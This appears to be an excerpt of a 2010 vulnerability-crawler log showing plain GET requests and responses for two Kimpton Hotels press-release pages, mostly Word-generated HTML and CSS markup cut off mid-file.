text-indent:-.25in;}@list l10:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l11 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l12 {mso..
- /pdfs/press/html/Cocktails-Cure-1109/index.html

/pdfs/press/html/Cocktails-Cure-1109/index.html

http://www.kimptonhotels.com/pdfs/press/html/Cocktails-Cure-1109/index.html

Request

GET /pdfs/press/html/Cocktails-Cure-1109/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 33247
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images//filelist.xml"><link rel=Edit-Time-Data href="images//editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>10</o:TotalTime> <o:LastPrinted>2009-11-18T18:19:00Z</o:LastPrinted> <o:Created>2009-11-18T18:21:00Z</o:Created> <o:LastSaved>2009-11-18T18:21:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>849</o:Words> <o:Characters>4842</o:Characters> <o:Lines>40</o:Lines> <o:Paragraphs>9</o:Paragraphs> <o:CharactersWithSpaces>5946</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;} /* Page Definitions */@page {mso-footnote-separator:url(":images/:header.htm") fs; mso-footnote-continuation-separator:url(":images/:header.htm") fcs; mso-endnote-separator:url(":images/:header.htm") es; mso-endnote-continuation-separator:url(":images/:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:854463416; mso-list-type:hybrid; mso-list-template-ids:-2144938804 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l2 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l2:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l4 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5 {mso-list-id:1929657465; mso-list-type:hybrid; mso-list-template-ids:1347988556 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-hansi-font-family:Calibri;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images//image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images//image002.gif" v:shapes="_x0000_i1025"><![endif]></span></p><p class=MsoNormal><span style='font-size:8.0pt'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><b><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b><span style='font-size:8.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz&amp; Company for Kimpton<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>ChloeMata Crane / 212-982-8300 x104 / <a href="mailto:cmcrane@baltzco.com">cmcrane@baltzco.com</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<o:p></o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>MarlieseEngel Traver / 212-982-8300 x112 / <a href="mailto:mtraver@baltzco.com">mtraver@baltzco.com</a><b><o:p></o:p></b></span></p><p class=MsoNormal><b><span style='font-size:8.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>KimptonHotels &amp; Restaurants<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>StaceyEllis / 415-955-5492 / </span><a href="mailto:stacey.ellis@kimptongroup.com"><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-s..
- /pdfs/press/html/Wine-Water-Seafood-0609/

/pdfs/press/html/Wine-Water-Seafood-0609/

http://www.kimptonhotels.com/pdfs/press/html/Wine-Water-Seafood-0609/

Request

GET /pdfs/press/html/Wine-Water-Seafood-0609/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Wine-Water-Seafood-0609/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 43884
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><link rel=OLE-Object-Data href="images/oledata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>1</o:TotalTime> <o:LastPrinted>2009-06-08T19:41:00Z</o:LastPrinted> <o:Created>2009-06-08T19:42:00Z</o:Created> <o:LastSaved>2009-06-08T19:42:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>1224</o:Words> <o:Characters>6981</o:Characters> <o:Lines>58</o:Lines> <o:Paragraphs>13</o:Paragraphs> <o:CharactersWithSpaces>8573</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:DontDisplayPageBoundaries/> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; 